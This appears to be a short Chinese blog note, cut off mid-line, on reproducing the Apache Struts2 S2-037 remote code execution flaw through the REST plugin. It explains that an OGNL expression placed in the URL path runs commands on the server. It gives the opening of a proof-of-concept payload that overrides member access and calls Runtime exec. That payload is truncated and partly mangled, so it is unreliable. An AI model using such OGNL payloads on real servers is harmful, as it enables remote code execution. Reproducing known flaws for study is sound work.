0x29. Apache Struts2遠程代碼執行漏洞(S2-037)復現

s2-037:使用REST插件啓用動態方法調用時,可以傳遞可用於在服務器端執行任意代碼的惡意表達式;使用http://localhost:8080/1/XXX這種請求方式,XXX可以是任何合法的名字 ,通過將XXX構造爲OGNL執行命令; poc: #[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getRuntime().ex
相關文章
相關標籤/搜索